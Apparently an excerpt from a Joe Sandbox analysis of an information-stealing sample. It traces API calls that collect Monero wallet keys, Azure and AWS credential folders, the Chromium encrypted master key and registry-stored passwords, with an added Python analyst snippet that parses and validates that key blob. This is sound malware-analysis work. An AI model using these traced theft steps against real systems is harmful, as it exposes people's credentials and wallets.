                                  • lstrcat.KERNEL32(?,0055147C), ref: 0053D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D24C
                                  • lstrcat.KERNEL32(?,00551480), ref: 0053D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D26E
                                  • lstrcat.KERNEL32(?,00551484), ref: 0053D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D290
                                  • lstrcat.KERNEL32(?,00551488), ref: 0053D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D2B2
                                  • lstrcat.KERNEL32(?,0055148C), ref: 0053D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053D2D4
                                  • lstrcat.KERNEL32(?,00551490), ref: 0053D2E3
                                    • Part of subcall function 0054A820: lstrlen.KERNEL32(00534F05,?,?,00534F05,00550DDE), ref: 0054A82B
                                    • Part of subcall function 0054A820: lstrcpy.KERNEL32(00550DDE,00000000), ref: 0054A885
                                  • lstrlen.KERNEL32(?), ref: 0053D32A
                                  • lstrlen.KERNEL32(?), ref: 0053D339
                                    • Part of subcall function 0054AA70: StrCmpCA.SHLWAPI(011F9288,0053A7A7,?,0053A7A7,011F9288), ref: 0054AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 0053D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: 486e88327117736d10eb2482313943e65a54f5a7e2c3a3fe50db20dd1fbfd7c0
                                  • Instruction ID: 20f4aa8fd17b473423d1d208e738bc657cf189ed8d944972c4cc1495084a6b69
                                  • Opcode Fuzzy Hash: 486e88327117736d10eb2482313943e65a54f5a7e2c3a3fe50db20dd1fbfd7c0
                                  • Instruction Fuzzy Hash: 99E17271950109ABEB44EBA0DD9AEEE7B78FF94309F104058F107B3091DE34AE49CB66
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,011FCE88,00000000,?,0055144C,00000000,?,?), ref: 0053CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0053CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0053CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0053CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0053CAD9
                                  • StrStrA.SHLWAPI(?,011FD0E0,00550B52), ref: 0053CAF7
                                  • StrStrA.SHLWAPI(00000000,011FCE28), ref: 0053CB1E
                                  • StrStrA.SHLWAPI(?,011FDAE0,00000000,?,00551458,00000000,?,00000000,00000000,?,011F9188,00000000,?,00551454,00000000,?), ref: 0053CCA2
                                  • StrStrA.SHLWAPI(00000000,011FDA60), ref: 0053CCB9
                                    • Part of subcall function 0053C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0053C871
                                    • Part of subcall function 0053C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0053C87C
                                  • StrStrA.SHLWAPI(?,011FDA60,00000000,?,0055145C,00000000,?,00000000,011F9248), ref: 0053CD5A
                                  • StrStrA.SHLWAPI(00000000,011F8FD8), ref: 0053CD71
                                    • Part of subcall function 0053C820: lstrcat.KERNEL32(?,00550B46), ref: 0053C943
                                    • Part of subcall function 0053C820: lstrcat.KERNEL32(?,00550B47), ref: 0053C957
                                    • Part of subcall function 0053C820: lstrcat.KERNEL32(?,00550B4E), ref: 0053C978
                                  • lstrlen.KERNEL32(00000000), ref: 0053CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 0053CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 2c50872d96c0783c0af2e8e32894fb9b7463a8f6307418f5cb4d19540ad114a1
                                  • Instruction ID: 90604ec9562e4a93d7d459f96e3ca24d74d5cb5f31f8c471ab2758dbedfb601d
                                  • Opcode Fuzzy Hash: 2c50872d96c0783c0af2e8e32894fb9b7463a8f6307418f5cb4d19540ad114a1
                                  • Instruction Fuzzy Hash: F0E12F72840109ABEB54EBA0DC99FEEBB78FF94304F004159F10663191EF346A4ACF66
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,011FB008,00000000,00020019,00000000,005505B6), ref: 005483A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00548426
                                  • wsprintfA.USER32 ref: 00548459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0054847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0054848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00548499
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 724220c4635c056c2c5c681ddb1418e89db0b3ce30de79c0394f2b5ba07a8dcd
                                  • Instruction ID: 5e01f5ccc3f78267c817efced8f4359482d1ddde5f8680a443477a032efa655a
                                  • Opcode Fuzzy Hash: 724220c4635c056c2c5c681ddb1418e89db0b3ce30de79c0394f2b5ba07a8dcd
                                  • Instruction Fuzzy Hash: 90814C71950118ABEB68DF54CC95FEEBBB8FF48704F008698E109A6180DF746B85CFA5
                                  APIs
                                    • Part of subcall function 00548DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00548E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00544DCD
                                    • Part of subcall function 00544910: wsprintfA.USER32 ref: 0054492C
                                    • Part of subcall function 00544910: FindFirstFileA.KERNEL32(?,?), ref: 00544943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00544E59
                                    • Part of subcall function 00544910: StrCmpCA.SHLWAPI(?,00550FDC), ref: 00544971
                                    • Part of subcall function 00544910: StrCmpCA.SHLWAPI(?,00550FE0), ref: 00544987
                                    • Part of subcall function 00544910: FindNextFileA.KERNEL32(000000FF,?), ref: 00544B7D
                                    • Part of subcall function 00544910: FindClose.KERNEL32(000000FF), ref: 00544B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00544EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00544EE5
                                    • Part of subcall function 00544910: wsprintfA.USER32 ref: 005449B0
                                    • Part of subcall function 00544910: StrCmpCA.SHLWAPI(?,005508D2), ref: 005449C5
                                    • Part of subcall function 00544910: wsprintfA.USER32 ref: 005449E2
                                    • Part of subcall function 00544910: PathMatchSpecA.SHLWAPI(?,?), ref: 00544A1E
                                    • Part of subcall function 00544910: lstrcat.KERNEL32(?,011FE798), ref: 00544A4A
                                    • Part of subcall function 00544910: lstrcat.KERNEL32(?,00550FF8), ref: 00544A5C
                                    • Part of subcall function 00544910: lstrcat.KERNEL32(?,?), ref: 00544A70
                                    • Part of subcall function 00544910: lstrcat.KERNEL32(?,00550FFC), ref: 00544A82
                                    • Part of subcall function 00544910: lstrcat.KERNEL32(?,?), ref: 00544A96
                                    • Part of subcall function 00544910: CopyFileA.KERNEL32(?,?,00000001), ref: 00544AAC
                                    • Part of subcall function 00544910: DeleteFileA.KERNEL32(?), ref: 00544B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: c040a66612e360f425315a0ac02710a88cc5a9dac9e4f2cf440a50214bd61c1e
                                  • Instruction ID: 7dc2b4b0423d3004bcdc7e06bb67d05f0ea43dcbea243f8b41b09a6b47edcec6
                                  • Opcode Fuzzy Hash: c040a66612e360f425315a0ac02710a88cc5a9dac9e4f2cf440a50214bd61c1e
                                  • Instruction Fuzzy Hash: 7D41827A94021867E750F770EC5BFED3B38BBA4705F004454B54A660C1EEB46BC98B97
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0054906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: 0b4aeca2807f88fc7e7579553e363d00ddc055e5a475a2505235716945617080
                                  • Instruction ID: 6aa1290e5aaf3ffc717308bd76d42e579bcfc670a46a6f4ffb7328d576180d0e
                                  • Opcode Fuzzy Hash: 0b4aeca2807f88fc7e7579553e363d00ddc055e5a475a2505235716945617080
                                  • Instruction Fuzzy Hash: B2711075910209BBDB04DFE4DC89FEEBBB9BF88340F108508F519A7290DB78A945CB65
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 005431C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0054335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 005434EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 4346ef60120941e3e0bf243a68d6b454bd2a322459fb4d5e68053efe1b37d897
                                  • Instruction ID: 7b5e66afcae98463f6ce5083faa4a14b718c178972ed122002380ddd4f4cfd4f
                                  • Opcode Fuzzy Hash: 4346ef60120941e3e0bf243a68d6b454bd2a322459fb4d5e68053efe1b37d897
                                  • Instruction Fuzzy Hash: 61122371840109AAEB59FBA0DC9AFEDBB38FF94308F504159F50666191EF342B4ACF52
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 00536280: InternetOpenA.WININET(00550DFE,00000001,00000000,00000000,00000000), ref: 005362E1
                                    • Part of subcall function 00536280: StrCmpCA.SHLWAPI(?,011FE878), ref: 00536303
                                    • Part of subcall function 00536280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00536335
                                    • Part of subcall function 00536280: HttpOpenRequestA.WININET(00000000,GET,?,011FE158,00000000,00000000,00400100,00000000), ref: 00536385
                                    • Part of subcall function 00536280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005363BF
                                    • Part of subcall function 00536280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005363D1
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00545318
                                  • lstrlen.KERNEL32(00000000), ref: 0054532F
                                    • Part of subcall function 00548E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00548E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00545364
                                  • lstrlen.KERNEL32(00000000), ref: 00545383
                                  • lstrlen.KERNEL32(00000000), ref: 005453AE
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: b3fb0e075f2e3c00a5be0453cd3c3893e89d9220eef9c59ecec075b0b053e9ff
                                  • Instruction ID: 665b1f8c0b8cea655db6aed1f2889876ae2e6a1fd1e6f813fbd8b0159b44bad3
                                  • Opcode Fuzzy Hash: b3fb0e075f2e3c00a5be0453cd3c3893e89d9220eef9c59ecec075b0b053e9ff
                                  • Instruction Fuzzy Hash: F251303095014A9BEB54FF60CD9AAED3F79FF90308F504018F80A5A592EF346B45CBA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: b533b59b10758e5e9dae5185c50e9971523db6329812ed0725a329becb754b33
                                  • Instruction ID: 1c270ff0b1cb1ae7048d2b8db2d9db5deba64f644e395947fcad2db0e00c51b6
                                  • Opcode Fuzzy Hash: b533b59b10758e5e9dae5185c50e9971523db6329812ed0725a329becb754b33
                                  • Instruction Fuzzy Hash: 49C1B7B594010AABDB14EF60DC8DFEE7778FB94308F004598F50A67241EB74AA85CF95
                                  APIs
                                    • Part of subcall function 00548DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00548E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 005442EC
                                  • lstrcat.KERNEL32(?,011FE608), ref: 0054430B
                                  • lstrcat.KERNEL32(?,?), ref: 0054431F
                                  • lstrcat.KERNEL32(?,011FD0B0), ref: 00544333
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 00548D90: GetFileAttributesA.KERNEL32(00000000,?,00531B54,?,?,0055564C,?,?,00550E1F), ref: 00548D9F
                                    • Part of subcall function 00539CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00539D39
                                    • Part of subcall function 005399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                    • Part of subcall function 005399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                    • Part of subcall function 005399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                    • Part of subcall function 005399C0: ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                    • Part of subcall function 005399C0: LocalFree.KERNEL32(0053148F), ref: 00539A90
                                    • Part of subcall function 005399C0: CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                    • Part of subcall function 005493C0: GlobalAlloc.KERNEL32(00000000,005443DD,005443DD), ref: 005493D3
                                  • StrStrA.SHLWAPI(?,011FE4B8), ref: 005443F3
                                  • GlobalFree.KERNEL32(?), ref: 00544512
                                    • Part of subcall function 00539AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539AEF
                                    • Part of subcall function 00539AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00534EEE,00000000,?), ref: 00539B01
                                    • Part of subcall function 00539AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539B2A
                                    • Part of subcall function 00539AC0: LocalFree.KERNEL32(?,?,?,?,00534EEE,00000000,?), ref: 00539B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 005444A3
                                  • StrCmpCA.SHLWAPI(?,005508D1), ref: 005444C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 005444D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 005444E5
                                  • lstrcat.KERNEL32(00000000,00550FB8), ref: 005444F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: f61d490d3bbc596ab629aba9b60be4ce3c2988e9f09e62487dece08daf76efab
                                  • Instruction ID: b1375af1d1df7fc886ad6ffed1f7735e04b50baf55df0a524a7dbf942c8def16
                                  • Opcode Fuzzy Hash: f61d490d3bbc596ab629aba9b60be4ce3c2988e9f09e62487dece08daf76efab
                                  • Instruction Fuzzy Hash: 247157B6900209BBDB14EBA0DC89FEE7779BBC8304F048598F51997181EA74DB45CF92
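The function above locates the string `"encrypted_key":"` in a Chromium "Local State" file and hands the value to CryptStringToBinaryA with flag 1 (CRYPT_STRING_BASE64): this is the browser master-key blob that Chrome stores as base64 of the ASCII prefix `DPAPI` followed by a CryptProtectData blob. The parser below is an added analyst example, not code from the sample or from Joe Sandbox; it reproduces the byte-scan the sample relies on beside a JSON-based variant, validates the prefix and the DPAPI blob header, and stops there, since the blob can only be opened with CryptUnprotectData under the victim's account. The sample Local State document it builds is constructed for the demonstration.

```python
import base64
import json

# Chrome writes os_crypt.encrypted_key as base64("DPAPI" + CryptProtectData blob).
DPAPI_PREFIX = b"DPAPI"
# A CryptProtectData blob opens with dwVersion = 1 followed by the DPAPI provider GUID
# {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB} in its little-endian on-disk layout.
DPAPI_BLOB_HEADER = bytes.fromhex("01000000" "D08C9DDF0115D1118C7A00C04FC297EB")
MARKER = '"encrypted_key":"'


def find_encrypted_key_substring(local_state_text: str):
    """Locate the value the way the sample's StrStrA scan does: find the marker and
    take everything up to the next double quote. Returns None if the marker is
    absent, which is what happens when the JSON is pretty-printed."""
    start = local_state_text.find(MARKER)
    if start < 0:
        return None
    start += len(MARKER)
    end = local_state_text.find('"', start)
    return local_state_text[start:end] if end > start else None


def find_encrypted_key_json(local_state_text: str):
    """Robust variant for analysts: parse the JSON instead of scanning bytes."""
    try:
        return json.loads(local_state_text)["os_crypt"]["encrypted_key"]
    except (ValueError, KeyError, TypeError):
        return None


def decode_master_key_blob(b64_value: str) -> bytes:
    """Mirror CryptStringToBinaryA(CRYPT_STRING_BASE64) and validate the result.
    Returns the CryptProtectData blob with the DPAPI prefix stripped; decrypting it
    needs CryptUnprotectData in the victim's logon session and is not attempted."""
    raw = base64.b64decode(b64_value, validate=True)
    if not raw.startswith(DPAPI_PREFIX):
        raise ValueError("value lacks the DPAPI prefix; not a Chromium master key")
    blob = raw[len(DPAPI_PREFIX):]
    if not blob.startswith(DPAPI_BLOB_HEADER):
        raise ValueError("payload is not a CryptProtectData blob")
    return blob


def build_sample_local_state(blob_body: bytes, pretty: bool = False) -> str:
    """Constructed test artifact: a minimal Local State carrying a synthetic blob
    (a valid DPAPI header followed by filler, not a real encrypted key)."""
    fake_blob = DPAPI_BLOB_HEADER + blob_body
    doc = {"os_crypt": {"encrypted_key": base64.b64encode(DPAPI_PREFIX + fake_blob).decode()}}
    # Chrome writes compact JSON (no spaces), which is exactly what the marker depends on.
    return json.dumps(doc, indent=2 if pretty else None,
                      separators=None if pretty else (",", ":"))


if __name__ == "__main__":
    sample = build_sample_local_state(b"\x00" * 32)
    blob = decode_master_key_blob(find_encrypted_key_substring(sample))
    print("DPAPI blob length:", len(blob))
    # Pretty-printed JSON defeats the byte scan but not the JSON parser.
    pretty = build_sample_local_state(b"\x00" * 32, pretty=True)
    print("substring scan on pretty JSON:", find_encrypted_key_substring(pretty))
    print("JSON parse on pretty JSON:", find_encrypted_key_json(pretty) is not None)
```

The substring path is faithful to the sample and therefore brittle: any whitespace after the colon breaks it, which is a useful detail when reasoning about why a stealer succeeded or failed on a particular host.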
                                  APIs
                                    • Part of subcall function 005312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005312B4
                                    • Part of subcall function 005312A0: RtlAllocateHeap.NTDLL(00000000), ref: 005312BB
                                    • Part of subcall function 005312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005312D7
                                    • Part of subcall function 005312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005312F5
                                    • Part of subcall function 005312A0: RegCloseKey.ADVAPI32(?), ref: 005312FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 0053134F
                                  • lstrlen.KERNEL32(?), ref: 0053135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00531377
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 00548B60: GetSystemTime.KERNEL32(00550E1A,011FA450,005505AE,?,?,005313F9,?,0000001A,00550E1A,00000000,?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 00548B86
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00531465
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005399EC
                                    • Part of subcall function 005399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00539A11
                                    • Part of subcall function 005399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00539A31
                                    • Part of subcall function 005399C0: ReadFile.KERNEL32(000000FF,?,00000000,0053148F,00000000), ref: 00539A5A
                                    • Part of subcall function 005399C0: LocalFree.KERNEL32(0053148F), ref: 00539A90
                                    • Part of subcall function 005399C0: CloseHandle.KERNEL32(000000FF), ref: 00539A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 005314EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 3bcbbb9a731cd2e77a46a8e5fdb2bb1efd05c98c208ccc4bbaadf643a9730ef8
                                  • Instruction ID: c1ce276225b5b549e0c141ae543cc493f6c38c52a960b57b9c6cc08edd8d7773
                                  • Opcode Fuzzy Hash: 3bcbbb9a731cd2e77a46a8e5fdb2bb1efd05c98c208ccc4bbaadf643a9730ef8
                                  • Instruction Fuzzy Hash: 505142B195011A5BDB55EB60DC9ABED773CFF90304F404198B60A62082EE346B89CFA6
                                  APIs
                                    • Part of subcall function 005372D0: memset.MSVCRT ref: 00537314
                                    • Part of subcall function 005372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0053733A
                                    • Part of subcall function 005372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005373B1
                                    • Part of subcall function 005372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0053740D
                                    • Part of subcall function 005372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00537452
                                    • Part of subcall function 005372D0: HeapFree.KERNEL32(00000000), ref: 00537459
                                  • lstrcat.KERNEL32(00000000,005517FC), ref: 00537606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00537648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 0053765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0053768F
                                  • lstrcat.KERNEL32(00000000,00551804), ref: 005376A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 005376D3
                                  • lstrcat.KERNEL32(00000000,00551808), ref: 005376ED
                                  • task.LIBCPMTD ref: 005376FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: :
                                  • API String ID: 3191641157-3653984579
                                  • Opcode ID: 6705f9f468edbb18dc27cefb32937b1ab39da0d77eaed08558f8ec6505ef8e12
                                  • Instruction ID: 7a9dbe40c19df0e005f34a3c3e05f364f79e9bc78510dcedffc162d20eeb9383
                                  • Opcode Fuzzy Hash: 6705f9f468edbb18dc27cefb32937b1ab39da0d77eaed08558f8ec6505ef8e12
                                  • Instruction Fuzzy Hash: DE315471D0010AEBDB19EBF4DC59DFF7B74BB88345F108118F116A7250DA38A986CB56
                                  APIs
                                  • memset.MSVCRT ref: 00537314
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0053733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005373B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0053740D
